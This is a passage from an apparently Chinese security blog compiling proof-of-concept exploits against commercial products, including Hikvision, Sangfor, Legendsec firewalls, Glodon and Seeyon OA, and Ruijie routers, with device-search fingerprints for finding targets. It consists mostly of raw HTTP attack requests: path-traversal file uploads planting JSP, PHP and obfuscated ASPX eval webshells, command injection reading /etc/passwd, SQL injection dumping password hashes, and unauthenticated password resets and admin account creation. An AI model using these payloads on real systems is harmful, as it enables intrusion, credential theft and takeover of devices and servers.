(KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,im age/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Cookie: JSESSIONID=4ABE9DB29CA45044BE1BECDA0A25A091.server Connection: close ------WebKitFormBoundaryvLTG6zlX0gZ8LzO3 Content-Disposition:form-data;name="downloadpath"; filename="a.jsp" Content-Type: application/msword hello ------WebKitFormBoundaryvLTG6zlX0gZ8LzO3--/maupload/apk/a.jsp深信服应用交付管理系统 login 远程命令执行漏洞漏洞描述深信服应用交付管理系统 login 存在远程命令执行漏洞，攻击者通过漏洞可以获取服务器权限，执行任意命令漏洞影响深信服应用交付管理系统 7.0.8-7.0.8R5网络测绘fid="iaytNA57019/kADk8Nev7g==" 漏洞复现登陆页面验证 POCPOST /rep/login clsMode=cls_mode_login&index=index&log_type=report&page=login&rnd=0.75501034664 97915&userID=admin%0Aifconfig -a %0A&userPsw=tmbhuisqHiKVISION 综合安防管理平台 files 任意文件上传漏洞漏洞描述HiKVISION 综合安防管理平台 files 接口存在任意文件上传漏洞，攻击者通过漏洞可以上传任意文件漏洞影响HiKVISION 综合安防管理平台网络测绘app="HIKVISION-综合安防管理平台" web.title=="综合安防管理平台" 漏洞复现登陆页面POST /center/api/files;.html HTTP/1.1 Host: Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a ------WebKitFormBoundary9PggsiM755PLa54a Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp" Content-Type: application/zip <%out.print("test3");%> ------WebKitFormBoundary9PggsiM755PLa54a--HiKVISION 综合安防管理平台 report 任意文件上传漏洞漏洞描述HiKVISION 综合安防管理平台 report 接口存在任意文件上传漏洞，攻击者通过构造特殊的请求包可以上传任意文件，获取服务器权限漏洞影响HiKVISION 综合安防管理平台网络测绘app="HIKVISION-综合安防管理平台" web.title=="综合安防管理平台"漏洞复现WEB-INF/classes/com/hikvision/svm/controller/ExternalController.class构造请上传文件 (通过 env 泄漏获取绝对路径，路径一般不会修改)poc1:POST /svm/api/external/report HTTP/1.1 Host: Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa5 4a ------WebKitFormBoundary9PggsiM755PLa54a Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/ web/components/tomcat85linux64.1/webapps/eportal/new.jsp" Content-Type: application/zip <%out.print("test");%> ------WebKitFormBoundary9PggsiM755PLa54a—/portal/ui/login/..;/..;/new.jsppoc2:POST /svm/api/external/report HTTP/1.1 Host: xxxxx Content-Length: 2849 Cache-Control: max-age=0 Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "macOS" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KH TML, like Gecko) Chrome/100.0.4896.75 Safari/537.36 Origin: null Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755 PLa54a Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/web p,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Connection: close ------WebKitFormBoundary9PggsiM755PLa54a Content-Disposition: form-data; name="file"; filename="../../../tomcat85linux64.1/web apps/els/static/111.jsp" Content-Type: application/zip xxxxx(优先建议哥斯拉 base64) ------WebKitFormBoundary9PggsiM755PLa54a— GET /els/static/test.jsp HTTP/1.1网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞漏洞描述网神 SecGate 3600 防火墙 obj_app_upfile 接口存在任意文件上传漏洞，攻击者通过构造特殊请求包即可获取服务器权限漏洞影响网神 SecGate 3600 防火墙网络测绘fid="1Lh1LHi6yfkhiO83I59AYg==" 漏洞复现登录页面出现漏洞的文件 webui/modules/object/app.mds网神 SecSSL 3600 安全接入网关系统未授权访问漏洞漏洞描述网神 SecSSL 3600 安全接入网关系统存在未授权访问漏洞，攻击者通过漏洞可以获取用户列表，并修改用户账号密码漏洞影响网神 SecSSL 3600 安全接入网关系统网络测绘app="安全接入网关 SecSSLVPN" 漏洞复现登陆页面验证 POC，获取用户列表 zkecGET /admin/group/x_group.php?id=2Cookie: admin_id=1; gw_admin_ticket=1; ![2023-08-15T16:51:49.png][24] 修改用户密码 POST /changepass.php?type=2 Cookie: admin_id=1; gw_user_ticket=ffffffffffffffffffffffffffffffff; last_step_param={"this_name":" ceshi","subAuthId":"1"} old_pass=&password=Asd123!@#123A&repassword=Asd123!@#123A POST /?g=obj_app_upfile HTTP/1.1 Host: Accept: */* Accept-Encoding: gzip, deflate Content-Length: 574 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBB Qc User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0) ------WebKitFormBoundaryJpMyThWnAxbcBBQc Content-Disposition: form-data; name="MAX_FILE_SIZE" 10000000 ------WebKitFormBoundaryJpMyThWnAxbcBBQc Content-Disposition: form-data; name="upfile"; filename="vulntest.php" Content-Type: text/plain <?php system("id");unlink(__FILE__);?> ------WebKitFormBoundaryJpMyThWnAxbcBBQc Content-Disposition: form-data; name="submit_post" obj_app_upfile ------WebKitFormBoundaryJpMyThWnAxbcBBQc Content-Disposition: form-data; name="__hash__" 0b9d6b1ab7479ab69d9f71b05e0e9445 ------WebKitFormBoundaryJpMyThWnAxbcBBQc-- 默认上传路径 /secgate/webui/attachements/ ，访问 attachements/xxx.php 文件广联达 oa sql 注入漏洞 POCPOST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1 Host: xxx.com Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,imag e/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://xxx.com:8888/Services/Identification/Server/Incompatible.aspx Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 88 dasdas=&key=1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER – 广联达 oa 后台文件上传漏洞 POCPOST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1 Host: 10.10.10.1:8888 X-Requested-With: Ext.basex Accept: text/html, application/xhtml+xml, image/jxr, */* Accept-Language: zh-Hans-CN,zh-Hans;q=0.5 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj Accept: */* Origin: http://10.10.10.1 Referer: http://10.10.10.1:8888/Workflow/Workflow.aspx?configID=774d99d7-02bf-42ec-9 e27-caeaa699f512&menuitemid=120743&frame=1&modulecode=GTP.Workflow.TaskCent erModule&tabID=40 Cookie: Connection: close Content-Length: 421 ------WebKitFormBoundaryFfJZ4PlAZBixjELj Content-Disposition: form-data; filename="1.aspx";filename="1.jpg" Content-Type: application/text <%@ Page Language="Jscript" Debug=true%> <% var FRWT='XeKBdPAOslypgVhLxcIUNFmStvYbnJGuwEarqkifjTHZQzCoRMWD'; var GFMA=Request.Form("qmq1"); var ONOQ=FRWT(19) + FRWT(20) + FRWT(8) + FRWT(6) + FRWT(21) + FRWT(1); eval(GFMA, ONOQ); %> ------WebKitFormBoundaryFfJZ4PlAZBixjELj—汉得 SRM tomcat.jsp 登录绕过漏洞 POC/tomcat.jsp?dataName=role_id&dataValue=1 /tomcat.jsp?dataName=user_id&dataValue=1然后访问后台：/main.screen辰信景云终端安全管理系统 login SQL 注入漏洞 POCPOST /api/user/login captcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin'and(select*f rom(select+sleep(3))a)='致远 OA 协同管理软件无需登录访问： ip/seeyon/htmlofficeservlet如果出现下图所示的内容，表示存在漏洞。构造 PoCDBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlV OPTION=S3WYOSWLBSGr currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66 CREATEDATE=wUghPB3szB3Xwg66 RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6 originalFileId=wV66 originalCreateDate=wUghPB3szB3Xwg66 FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2 dEg6 needReadFile=yRWZdAS6 originalCreateDate=wLSGP4oEzLKAz4=iz=66webshell访问 webshell锐捷 Ruijie 路由器命令执行-CVE-2023-3450icon_hash="-399311436"该漏洞属于后台漏洞，需要输入密码进入后台（默认密码 admin）点击左下角的“网络诊断”，在“Tracert 检测”的“地址”框中，输入 127.0.0.1;cat /etc/passwd，接着点击“开始检测”，会在检测框中回显命令执行结果。127.0.0.1|id命令执行数据包GET /cgi-bin/luci/;stok=9ba3cc411c1cd8cf7773a2df4ec43d65/admin/diagnosis?diag=tracer t&tracert_address=127.0.0.1%3Bcat+%2Fetc%2Fpasswd&seq=1 HTTP/1.1 Host: IP:PORT User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest DNT: 1 Connection: close Referer: http://IP:PORT/cgi-bin/luci/;stok=9ba3cc411c1cd8cf7773a2df4ec43d65/admin/diagnosis Cookie: sysauth=b0d95241b0651d5fbaac5de8dabd2110目前厂商已发布升级补丁修复漏洞，补丁获取链接：https://www.ruijie.com.cn/该漏洞由于正常功能过滤不严格导致存在命令注入，并且需要高权限账号登录操作，建议修改登录密码为强口令，通过白名单控制访问原地址。蓝凌 oa 前台代码执行漏洞CNVD-2021-28277fofa 查询语句app=“Landray-OA 系统” 漏洞复现漏洞链接：/sys/ui/extend/varkind/custom.jsp漏洞数据包：POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 Host: User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Accept: */* Connection: Keep-Alive Content-Length: 42 Content-Type: application/x-www-form-urlencoded var={"body":{"file":"file:///etc/passwd"}}安恒明御运维审计与风险控制系统堡垒机任意用户注册POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc HTTP/1.1 Host: xxx Cookie: LANG=zh; USM=0a0e1f29d69f4b9185430328b44ad990832935dbf1b90b8769d297dd9f0eb848 Cache-Control: max-age=0 Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ 100.0.4896.127 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0. 8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Length: 1121 <?xml version="1.0"?> <methodCall> <methodName>web.user_add</methodName> <params> <param> <value> <array> <data> <value> <string>admin</string> </value> <value> <string>5</string> </value> <value> <string>XX.XX.XX.XX</string> </value> </data> </array> </value> </param> <param> <value> <struct> <member> <name>uname</name> <value> <string>deptadmin</string> </value> </member> <member> <name>name</name> <value> <string>deptadmin</string> </value> </member> <member> <name>pwd</name> <value> <string>Deptadmin@123</string> </value> </member> <member> <name>authmode</name> <value> <string>1</string> </value> </member> <member> <name>deptid</name> <value> <string></string> </value> </member> <member> <name>email</name> <value> <string></string> </value> </member> <member> <name>mobile</name> <value> <string></string> </value> </member> <member> <name>comment</name> <value> <string></string> </value> </member> <member> <name>roleid</name> <value> <string>101</string> </value> </member> </struct></value> </param> </params> </methodCall>
- 2023年08月14日
- 81 阅读
- 0 评论
- 0 点赞

1
2
3

月影

85 文章数

101 评论量

自研poc合集（持续更新中）
海康威视常见漏洞收集
常见端口及未授权访问汇总

人生倒计时

舔狗日记

已运行 00 天 00 时 00 分 00 秒

沪ICP备2023039113号